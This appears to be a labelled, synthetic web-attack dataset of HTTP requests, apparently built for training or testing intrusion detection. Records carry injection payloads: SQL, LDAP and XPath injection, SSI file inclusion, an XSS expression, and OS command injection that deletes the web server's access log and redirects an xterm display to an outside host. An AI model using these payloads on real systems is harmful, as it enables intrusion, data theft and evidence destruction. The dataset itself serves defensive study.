UA-Pixels: 2096x915
Via: 3.9 216.203.247.210, 7.6 63.100.19.243, 5.6 www.gder.js:36936
Transfer-Encoding: compress
Upgrade: paa/8.6, yprO/1.1
Warning: 851 www.az5hggy.shtml "VesmErqyeabiHr" "Sun, 05 Mar 06 07:25:39 GMT"
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45504
Start - Id: 36868
class: LdapInjection
GET /eyRtsLzard8uu4nmm2.html? HTTP/1.0
Host: 93.233.149.3:32
Connection: close
Accept: text/html
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.4, deflate;q=0.0
Accept-Language: 705)(&(objectClass=lzan)(|(sn    = tn)(cn=us J*))
Cache-Control: e=oa
Client-ip: 201.122.102.52
Cookie: terex=42
Cookie2: $Version="178"
Date: Wed, 17 Jun 09 16:32:03 CET
ETag: "T30brrwlJ-MlcN4@"
From: Ecpb@orxe.ch
If-Modified-Since: Sun, 29 Aug 04 19:27:20 GMT
If-Unmodified-Since: Wed, 21 Mar 07 20:13:50 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Siehdf xOsbee1=osyh
Authorization: NTLM dHBobFRydGRib3Zyc25jc3RzeGIwbWRzb2VyMXJobmlpeXNhbG1zb2hoYVc4ckQ=
Referer: http://1aoaosr.com/aidtto/ezgca1/4jhhGq/gh9t.mp3
User-Agent: taovglEn (t6QAivR4; axIX9Zn; i_Xa89ib; hA2S7Lm)
UA-Disp: 8264,339,8
Via: HTTP/8.8 www.eeernu.html, FTP/6.1 158.41.21.233, 8.1 112.125.1.62
Transfer-Encoding: gzip
Upgrade: hAayi/6.8, sest/5.4, shiokr/0.2, jie6E/3.0
X-Serial-Number: 310795223019
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36868
Start - Id: 35332
class: SqlInjection
GET /pa/rsYu0i4qhuaohala6/nm/sderhrd/snw/FLt8.php3?pATxp_-@Fx=2&TAaCQzF9k=me3ldTd&w2pad=%27%3B+++begin++declare+%40ret+varchar%288000%29+++set+++%40ret%3D%27%3A%27+++select++++%40ret%3D%40ret%2B%27++++%27%2Beid%2B%27%2F%27%2Bpassword+++from+ieno++++where++++yigen%3E%40ret+++select+%40ret++++as+++++ret++++into++++foo+++end--&yewehlnjacqg=nhnullhh HTTP/1.0
Host: www.soop.cz
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-roman;q=0.6, x-mac-arabic, cp-950;q=0.6, x-mac-japanese;q=0.7, windows-1255;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=23646
Client-ip: 85.135.241.126
Cookie: gYKyPwindow.openDG=vc'leEhdtin;Xn.WnzpdZ_zv=noinst9;.m@logq=oGZ8KhpW;ty=166871
Cookie2: $Version="68"
Date: Fri, 13 Mar 09 18:12:42 UTC
ETag: "QOvh8ehD1t657W06o5"
Expect: Umhv
From: atozRhO@AwAlyrse.it
If-Modified-Since: Fri, 02 Sep 05 12:31:31 GMT
If-Unmodified-Since: Sat, 27 Aug 05 21:39:06 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Jan 05 22:09:21 GMT
Max-Forwards: 2
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: atycI 2asdkev=ihnepyo
Range: 16442-228208
Referer: http://aofekhff.st/azufw.pdf
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: or8o080ttEiR
UA-CPU: StrongARM
UA-Disp: 703,585,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5578x419
Via: FTP/0.5 www.heontsh.tiff:8528, 1.4 237.19.194.84, l6n/3.2 www.GeaGnn.css
Transfer-Encoding: identity
Upgrade: msSEA/8.6, izzty/7.9, ohTa/9.3, te3/1.4, xje/3.3
Warning: 635 237.151.216.13:8 "tstkg" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 9356932
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35332
Start - Id: 39101
class: LdapInjection
PUT /ubFmtCcCP_s0gn2jXdiI/QXeJQF/1SGRaesahxolTcouf5l/mp.u/sJGRVAGL11D.w/ejxqYFHDXqSPmeCmE/qAdeleteperlposition/ics1iisFyamdus/ztRd/nM7SPvT/gJ0adeleteL.sh? HTTP/1.0
Content-Length: 209
Content-Language: mawdtyH,jtcltrd,u
Content-Encoding: deflate
Content-Location: http://www.thse.biz/rfiin/Osne2/Sc1schda.gif
Content-MD5: d2llSHZqY2xIRmFyb2Rscw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Aug 05 13:07:41 CET
Last-Modified: Sun, 10 Apr 05 19:22:51 UTC
Host: 93.106.26.52
Connection: close
Accept: audio/*, audio/*, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.6, identity, deflate;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 133.82.168.94
Cookie: aov2Trtrtdhra=)( |( cn=*o  'brien*   )(mail=*o 'brien* );yfthtuunmah=onacEsreokesoig;Nuowsmned=048;sNulpe2b9E=1cGOuSa9DTs;wusels=trftr9
Cookie2: $Version="208"
Date: Wed, 06 Jul 05 22:33:42 CET
ETag: W/"zSESMi609uroL3G"
Expect: hhhrtm
If-Modified-Since: Sat, 22 Jul 06 17:03:53 CET
If-Unmodified-Since: Tue, 04 Jul 06 05:03:06 UTC
If-Match: *
If-None-Match: "Goe5kxVaT_qlsrUr_"
If-Range: "xry4hEVnv_bBE2TR"
Max-Forwards: 9
Pragma: no-cache
Proxy-Authorization: Basic bmg0SXR0VGc6dVRjbg==
Authorization: Digest algorithm=jno4
Range: -3,502-
Referer: /rvotNln/xhyfF/memTmwom/cseczny/A46bdme.tiff
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: dSsTQS-H http://www.kpRhm.biz
UA-CPU: Sparc
UA-Disp: 873,752,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 825x605
Via: 4.2 221.132.52.231, 1.0 www.7gge.png:1
Transfer-Encoding: gzip
Upgrade: 7eeKe/5.6, Suar/6.3
Warning: 156 www.anuenrdb.jpg "stUa8h3rlELwts" 
X-Forwarded-For: 160.192.213.166
X-Serial-Number: 21391
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

6cdaptt=rraw1r&wweExenitt2iwi=hg&sjdAfd=eaccept~H2tmp69u$t8lsCln&yrlighrsamdhs=rtmxml&b2usnhY3o=9008&HZ5KcG@9ftp8=Tgoqwrludv(v&niionysD=n-vbscriptqo|wt?enoru&e3rnehhnetsev=7&9tiEzhJhmpn2=rO6FnpuOnflN

End - Id: 39101
Start - Id: 36734
class: OsCommanding
GET /lvsD-r/m.@/nGO1m/Lj3q/linO/d6WJ9daX2jgIV.Z.gI5/1rgIyxml9g/sIXeas7/0Tuste/mUcPlZ6i-Q5/mckMU9QP/ti30h2.vBn2BSuyUhr.html?wongieM4Ksna=%250Axterm+++-display++++www.oliell.com%3A0.0+++&sR=h+trreA&adves9hefol=hi5ia%7EegiallnGnsmnm HTTP/1.1
Host: www.trptGe6r.gov
Connection: close
Accept: image/*;q=0.7, text/html, text/html
Accept-Charset: x-mac-cyrillic, iso-8859-2
Accept-Encoding: deflate;q=0.8
Accept-Language: em-ostrtec, eR8-r;q=0.6, uc-oohye;q=0.1, us-sE
Cache-Control: max-age=4844
Client-ip: 103.144.20.186
Cookie: Ettra=5;hNsWLxtlrs6h=8;nAaeekcme0eu=7597;csasnsai=6ajtmrzwmtoaqyYyyh;JGy-5obetween=BYc
Cookie2: $Version="7"
Date: Mon, 30 Apr 07 15:16:37 UTC
ETag: "FaWmKnGLIj3GuDEP9"
Expect: 100-continue
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 26 Aug 06 19:08:23 GMT
If-Unmodified-Since: Sat, 02 Aug 08 17:21:37 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Feb 07 24:14:29 GMT
Max-Forwards: 418
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: it0a ison5ofO=srsyk
Authorization: arbdmm d5imtsen=htu1tR
Range: -47510,582-0
Referer: http://edtIitDt.it/tnd0e/2nvtwt8/s1yO.php
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: TTh4Sp/7.5.8
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 402x4966
Via: HTTP/5.1 www.exeEe.html
Transfer-Encoding: clis
Upgrade: rss8so/4.4, hNo/7.8, dfee/8.1
Warning: 156 39.92.206.178 "handies1bawt" 
X-Forwarded-For: 246.253.133.9
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36734
Start - Id: 48818
class: XPathInjection
GET /risreaT/nSmstt3eatiLmookea/ostdinMYG-.yqk/h@Gq_3hSBE5mk28zZd-Y/rmIBSRiMPEp/cmktnwss/knzatund/AXfsb3CiN/mmm9S_dzO/OuvjrvacjNldtnortw/eju4NHs6ZVSBR.js?ed8ttslIzsu=5+++or++dnIn%2Feeeim%2Fci%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D44%5D+or+++++36078%3D&gfFocbetxtghTnn=n%3Eoyonttdivrta&rnw7eqcse=cxP&eeewfaee=eielikeai%29&zh3dreondthero=hNtmpujztd6atn&r1dq=7&02lnsi6=69809&nJJk=0dhavingryusaast3p HTTP/1.0
Host: 197.191.228.96
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: Tcdi-smmlIais, ge0-0eme;q=0.6, wju-ensu, tmhtubf-y, eecmOi-t0q;q=0.9
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: ejimrmsrrtpa5ee=izH;ayiuqxt=4rd;oJU7t=533369;awbt=qhbP.vx.lg;NP0Hhscripto6U=wvllsrlix
Cookie2: $Version="5"
Date: Sun, 13 Apr 08 10:13:37 UTC
ETag: "0JL8ne9UeNDlDOMS"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Sun, 22 Nov 09 21:54:43 GMT
If-Unmodified-Since: Sat, 03 Jan 09 04:44:01 CET
If-Match: "pnb8US@PQvkwzbscxdMT"
If-None-Match: "bo6MEw4LrjPAOvEooCQ"
If-Range: Sat, 07 Jun 08 05:03:08 CET
Max-Forwards: 27
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: tCjw ehrbwm=shqlhtz
Authorization: Digest nonce
Range: 5920-3
Referer: /mhhdc/3tgUt7t/gnabmnu/mumt2se.mp3
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.1 (X11; U; Solaris 9.0; o8-el; rv:0.2.4) Gecko/17430393
UA-CPU: MIPS
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: DgPrai/4.4
Warning: 902 221.77.27.240 "H6v5cts" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48818
Start - Id: 44937
class: PathTransversal
GET /y6Fm/fBrcp6QGNO58Sreplaceb19/1nnbaacark.php3?uiOwu=24436&Kzbetween3Ua.jY=aygx6gelq5mi&9s4f9Nfoleurihk=em&tudsoent7=collection%28++++file%3A%2F%2F%2Fc%3A%2Fkj%2Fsetros97.xml%29&etmvi=2yom4Ma+&ciidEritod=4588858496 HTTP/1.0
Host: 193.66.175.93
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.0, deflate, deflate, identity
Accept-Language: Xmmbs-lcdise;q=0.9, u-w;q=0.5, erade2s-z08dHc
Cache-Control: no-transform
Client-ip: 205.151.162.96
Cookie: co=ecus;Y3httpsA=tXhtopcr\stdin3;nmup=eafe
Cookie2: $Version="19"
Date: Tue, 29 Apr 08 15:31:45 CET
ETag: W/"FTabip4q-bvxfAK_"
Expect: El7seo=rAoiW;yh7itv=latecp
From: Tnis@tashwes0i.st
If-Modified-Since: Mon, 25 Sep 06 13:36:58 CET
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 10 May 04 05:39:10 UTC
Max-Forwards: 2
MIME-Version: 8.4
Pragma: nmaynthe=enrHlq
Proxy-Authorization: NTLM aGExY2ZuZ2h5ZXN0YWVoamkwNjR4c0FxdG96eGh0cmVpcGVjdGVzbmV5ZW1hbg==
Authorization: Digest nc=639d7333
Range: 032407-30
Referer: /e2fnc/ouye.php3
TE: trailers
Trailer: Cache-Control
User-Agent: eiNfcsih
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 571x611
Via: 2.4 www.komsytl.gif, HTTP/8.9 www.P8csToo.gif:99922, HTTP/7.0 www.ro3ee.png
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 950 137.235.245.175 "hbxglaknHngrreueDa" "Wed, 14 Feb 07 12:55:59 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44937
Start - Id: 48966
class: XPathInjection
GET /lsy9voeu/my10-4gWYt/nebTNc-H/x0U7/4-rH-6s9jH/S19tQX5_tuh5/eTZW@lT_n/sNz45IZa@A.js?Lsst=4187137&WeEdfsaSUttqc=87&Ncttn4gx=61537457&ap1nme=gainGN7tN9&rTFDeracn=ha&etselHz4tllteeS=50241&EAacmduc7Olh5i=se3vivbZTSx&script0SgQXxvDwindow.open=pRcdP%2Fesrdmx%2Fm9eV%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D14%5D++++%7C+++++enm%2Fv8r%2FynneE3%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D72%5D++or+%27olnsdae%27+%3D+++%27&ruuhn=1d+%29%285mEose&akto0him=240455921&muety6e=erno&rSe=s2e+erq%3FsKa&ofxeldegr6w=tn3if&feidsa=iO3T HTTP/1.0
Host: www.giseptpge.org
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ns2ye-newf;q=0.8
Cache-Control: no-cache
Client-ip: 196.26.247.32
Cookie: _0aLRL219=tMi-2DVCVjv.;da=objectetds;eihcont=54JsDqRZUocG;-@passthrus9s=6
Cookie2: $Version="6"
Date: Fri, 03 Jun 05 13:55:19 GMT
ETag: "reLBqS.c1cCvJytvLS8"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Sat, 15 Dec 07 17:00:37 CET
If-Unmodified-Since: Sat, 24 Jul 04 13:31:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 899
MIME-Version: 6.3
Pragma: 8sqe=13nrb
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: 0igehl tnRi=lsneia
Range: 23-,057-,45-
Referer: http://ngfoge5.de/htn3leaf/mTuefans/mttsl/AHpLalU.jsp
TE: deflate,chunked;q=0.2
Trailer: Accept-Encoding
User-Agent: satidshrao
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/9.0 www.h7ai.gif, FTP/1.5 163.123.25.161
Transfer-Encoding: deflate
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48966
Start - Id: 46837
class: XSS
POST /eathaf/tMoneeoeLeie/eY79x-/aHGA72s3@YLnGa/hp2.png? HTTP/1.0
Content-Length: 403
Content-Language: qr
Content-Encoding: gzip
Content-Location: http://www.boinme.uk/he0nos/eckooa8/nafsa/ai0Lt/tl0yora.msf
Content-MD5: aGVtc3QzaHRuZHdyZ2VKbA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Aug 04 21:12:40 GMT
Last-Modified: Wed, 14 Sep 05 11:14:56 GMT
Host: 246.205.246.178
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: denT-j;q=0.7, aw8gnk-nlsabt, acdh-hzhsns;q=0.0, adr-t9
Cache-Control: s9tlaern='cdb6'
Client-ip: 169.136.109.14
Cookie: csrtl5r=n7jchildh;dgtfeecvaiid=81677145
Cookie2: $Version="75"
Date: Wed, 08 Oct 08 23:51:36 CET
ETag: "4y65XizpsvxblzyDhxg"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Fri, 18 Mar 05 11:38:57 UTC
If-Unmodified-Since: Mon, 05 May 08 20:40:51 GMT
If-Match: "8GA@JKhk@20w68W-nV"
If-None-Match: *
If-Range: Wed, 13 Jan 10 17:14:26 CET
Max-Forwards: 3696
MIME-Version: 5.0
Pragma: ci=o7xr
Proxy-Authorization: NTLM Y2xlb0RhYWloY2Vsbm50dG5oZW94ZWV0MHNveWllTW84bm5pajhmcjdyb3Q5
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: /haehvon/e5nqedse/qteti.bin
TE: trailers,gzip;q=0.9
Trailer: Referer
User-Agent: Mozilla/0.1 (X11; U; Open BSD i586 3.8; ot-sn; rv:5.0.5) Gecko/69558819
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: HTTP/5.6 www.hertf.html:88606
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sqe4imztaabui=46719666&DevformYImvarrEh=uRciNXl.K&ajteud8Xroti=da  "        style=left:expression(alert  (" 3.p  "))   alt=    "&eeiyvt4lus=08281&cauhlseyIVoa=shrih2ifs6inmcm&eiesauHe=2&nCQkautoexec=8.xFWkv&nwom8lg=$ittirnoa:7itiado>=&stwUi=256&co0me8h=4hgzeetia&q9eioytkesied=rtigstNs'Fwinnt&9rwikeqAtfri=3&wrt=Iqde&2seny2b=hwhtr\nnpEinputd&rVxejteoe4kc6tl=Lggssedutln

End - Id: 46837
Start - Id: 40717
class: SSI
POST /tRvEP1nm.eP0.d6l/moo6anolu7ehoebEi/emot2osnsmoesbenast7/o-mrymjr.swf? HTTP/1.1
Content-Length: 18
Content-Language: t
Content-Encoding: deflate
Content-Location: http://www.htanbnam.biz/h8istq/CpHaog.css
Content-MD5: dWNob2I4ZGNlZGE1dGR6cw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 28 Nov 04 13:42:26 UTC
Host: www.trscay.org
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-roman;q=0.8, windows-874;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=7657
Client-ip: 134.9.249.178
Cookie: tmo81paqhstot=<!--#include    virtual="c:\winnt\system.ini"     -->;yu7js=absg9adzCrolu1r;sg5telnetsmexC=ieoaL ee6topenop
Cookie2: $Version="9"
Date: Mon, 03 May 10 03:47:19 UTC
ETag: "QP5@URIFEwG0pu@M@"
Expect: tntcoo
From: ycai@teejSvk.be
If-Modified-Since: Sat, 04 Apr 09 14:06:57 UTC
If-Unmodified-Since: Fri, 03 Jun 05 02:09:39 GMT
If-None-Match: *
If-Range: *
Max-Forwards: 211
Pragma: no-cache
Authorization: oS2ufx seaE=ABnb0e
Range: -16073
Referer: http://aoteb.it/o4roeinr/hja0/aUiovpca/hglnps/xxls.sh
User-Agent: Mozilla/6.3 (compatible; frwm2hefES; Unix; oet0e84rue)
UA-Disp: 5869,313,8
UA-OS: WinNT
UA-Color: color8
Via: ahn7wi/5.1 www.nhoe.html:6760, 6.8 www.oQaytla.html
Transfer-Encoding: 9ehnzt; tyotiu=uqeattht
Upgrade: bam/1.3

7tenhsecitetlg=eLe

End - Id: 40717
Start - Id: 48370
class: XPathInjection
GET /7soha1jmeArlt/@wasUz.DQ.0aVYn/bxadtp/cXPLFF-I/ipemo/i@848T.pl?uolw3opXahh=9j9&pythzea=0a4t%27It&dotiotg5l=7958332281 HTTP/1.1
Host: www.eilnr.org
Connection: aRhs
Accept: application/rtf, application/*, video/*
Accept-Charset: cp-950, hz-gb-2312
Accept-Encoding: *
Accept-Language: ese-noF, aiydyi6k-iE8Grlz, dl3sUadv-t5;q=0.7, Afswa3-rbtes
Cache-Control: lf=w
Client-ip: 109.152.0.174
Cookie: WIQandutelnet=5262;tfuesetnnes=r2rled1Vceiaeise;hethn=rooebai9pbmacbCiet;ersgb=hdEWrTcopyeeat;90GacceptVdpUMm=hEFLdA0-RGAi
Date: Tue, 26 Oct 04 11:56:56 CET
ETag: W/"tRb0hSi7Z-lsMvE"
Expect: HetkQ=ev2xa
From: s5al6B3@ostl.it
If-Modified-Since: Fri, 29 May 09 14:02:28 CET
If-Unmodified-Since: Fri, 14 Mar 08 20:09:49 UTC
If-Match: *
If-None-Match: "4pb88AaEDp1BxPU8YD"
If-Range: *
Max-Forwards: 17
MIME-Version: 1.1
Pragma: ediueinc=ldl
Proxy-Authorization: Digest realm
Authorization: NTLM c2EyZWxnbmFvbGtsZmFrZWN1ZW1jYWVlZWVpcjBvTEFC
Range: -101,-0,2257-
Referer: http://www.lsjs.ch/erln5eda/9kaFscl.dll
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: tnce'  or     path/child::node()[position()=N]   or   'scpc'   =  '
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 516x4086
Via: HTTP/6.5 www.syguecyb.css, FTP/6.5 132.197.45.30
Transfer-Encoding: deflate
Upgrade: bet/7.8, 8soh/6.0, iHde0s/2.8, dtO/9.5
Warning: 920 242.150.132.18 "hesjsoctncttlo" "Wed, 13 Jan 10 09:05:54 UTC"
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48370
Start - Id: 49765
class: XPathInjection
GET /Lho3eE4a9is5l/aScQ7MYt4UX/tdrpletfAenrai/rF_Id/WF/up8twcn5.asmx?yiwhrurWod=6446505&nilbeot1lyld=eLhofae&ilwgi1n=Ehrts&e4tidtueiuSyW=s0A-.hihzEsK&Pethmet7sitrp=ny&dwt=Ae3nRsA6%27+++or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++++i++%2B+++j+%2B+++k++%2B++l+%2B+1%29%5D+++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+%27ni%27+%3D+%27+++itu%27+++++or&slfwgsiyrCarn=tt%3Fhi+nk&ts=s+hrE&sal=87308588&ilr2lsicuptaqea=8403422683&nwFnodeJ8wgetzU=60595&ulgn1n=036137&eRTeealErSobad=ye%5Cr&gahe=njcb+uoaunion&slA6iafafx=842103 HTTP/1.1
Host: www.eisns.it:9
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=824
Client-ip: 253.1.218.202
Cookie: bemoE2Ss=1929
Cookie2: $Version="367"
Date: Wed, 13 Sep 06 12:51:38 UTC
ETag: W/"gejDXjnrS6tpYzTu_6xQ"
Expect: 100-continue
From: 1ni9pe@Genwbli.net
If-Modified-Since: Sat, 23 Jun 07 08:01:21 CET
If-Unmodified-Since: Mon, 02 May 05 03:20:53 CET
If-Match: "c98mJwrmUi-fEew6u"
If-None-Match: "DCGQMlwt9OyStRuonJp"
If-Range: *
Max-Forwards: 8
MIME-Version: 6.0
Pragma: 5tttnoa='ict'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 038-33,-803
Referer: http://www.4iPe4.uk/aoje.zip
TE: chunked,chunked
Trailer: Connection
User-Agent: 1ynpdln6h (scI5Ex; obU_mpKQFv)
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3095x7377
Via: ggttH/6.2 40.50.131.127
Transfer-Encoding: deflate
Upgrade: GSoe/1.5, rrhgtt/1.3, efe/7.8, glEFPo/9.7, sicV8/5.3
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49765
Start - Id: 43092
class: OsCommanding
GET /oaecnnteet/8234Dh1tv/tEpNKzn@-/esa9iont2Tsdoo/Of6aburct3i2hfcwl/eBqimrleirnat/6d5Sx.js?ozsesda=esahnsjeddaneduiIo&2iR2J7=0265&idesqeefeeyp=igFeseOolexecdtvard&Aiainfsi0ne=2420918&anm3ftylohem5jf=%250arm+-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log++++%3B&otagm8s=ynNh%3E7spositionenvhE&bfh=eiea8&tohvv1nce=3123 HTTP/1.1
Host: www.tnbosu.be:80
Connection: etiztq
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tz-asp, s8f-aph;q=0.0, keedoe-Ou, rAnad-qtrrrefo
Cache-Control: only-if-cached
Client-ip: 115.146.109.73
Cookie: lkssdsTro=jxNhuWCs;aattvau=7anT;acTe0t0LaF=-aorcaHlrhgd7ue;xRp1k6fJTKG=c@Ri.bO0a;cwntDdh=yu$o;igsaoeena38ceoe=hFbm8h-XrG
Cookie2: $Version="41"
Date: Mon, 29 Sep 08 12:03:24 GMT
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Modified-Since: Mon, 09 Jan 06 20:32:24 CET
If-Unmodified-Since: Tue, 18 Apr 06 19:01:19 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7645
MIME-Version: 7.3
Pragma: ient='i7'
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: http://ohut9ssd.com/ekanahct.msf
TE: chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: 6mtsx2gdi/1.2.7.1.7
UA-OS: Mac OS X
Via: FTP/8.2 www.iog9irtq.png
Transfer-Encoding: identity
Upgrade: Fese/9.7, uSe/3.6, alh/3.9
X-Serial-Number: 306986025864028
----: ------------------------------------------------

null

End - Id: 43092
Start - Id: 41929
class: SqlInjection
GET /tdw25ErJehw6/@metaGid5WtmpPJ9qe6Yo/dL2w4DY/aeesKy/xNpaw/mUSGYiyhEismqqj9kVQ/ndropformBIV_941c1StE/73uuu6yc/esFjot/qusqetzJsatAopiteh.js?aqld=u&rs=l%25eap7asjOdallb1u+eoe%2F&eho=9213966929&hSKwhereaj=rq5+ipndropEhtaccesrglcopyrnulleJ&sNmRatsi3yb=%27%3B++insert+into+tn9nf++++values%28666%2C%27oro21lh%27%2C%27y9nj%27%2C0xfffff%29&sttjanii=nE6Gq4&kt8iil1Wkok=atlaN&ecaGsa8nbdrqdta=5058853&2ir8bgr=%2Fe&otrec=edpxTSRP&W0LtmpP=28&a3e=7324658293 HTTP/1.0
Host: www.56yh.biz:80
Connection: pjueAm
Accept: */*
Accept-Charset: windows-1255;q=0.0, windows-1251;q=0.3, iso-2022-jp
Accept-Encoding: deflate;q=0.9, identity, gzip
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 167.205.9.192
Cookie: iiabsn1pft5a=v ;aac=window.openi Ot7oltdocumentmochar\si
Cookie2: $Version="26"
Date: Sat, 17 Nov 07 14:41:07 UTC
ETag: "o4V4NB.J9gXaYf8twh"
Expect: 100-continue
From: uedR4wh@iydiiAh.st
If-Modified-Since: Thu, 09 Oct 08 13:01:50 CET
If-Unmodified-Since: Sat, 22 Jan 05 18:09:20 UTC
If-Match: "gezxUR8lLgf2Vj4_"
If-None-Match: "86NMV@.8B3FpIztt1"
If-Range: Mon, 25 Feb 08 08:50:19 UTC
Max-Forwards: 3
MIME-Version: 8.6
Pragma: Tertaen='tE'
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: qm5t ecesdu=orTms
Range: 230210-,74601-,-666
Referer: http://www.fvsRb.uk/aroea/eahe/eaea/6Ia4pPme.swf
TE: trailers,chunked,chunked
Trailer: Date
User-Agent: be1w/6.6.8.7.7
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1720x8487
Via: FTP/5.7 223.170.21.181, 9.8 15.19.178.124, 3.9 15.184.144.16
Transfer-Encoding: gzip
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 169.141.62.144
X-Serial-Number: 850343
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41929
Start - Id: 37245
class: LdapInjection
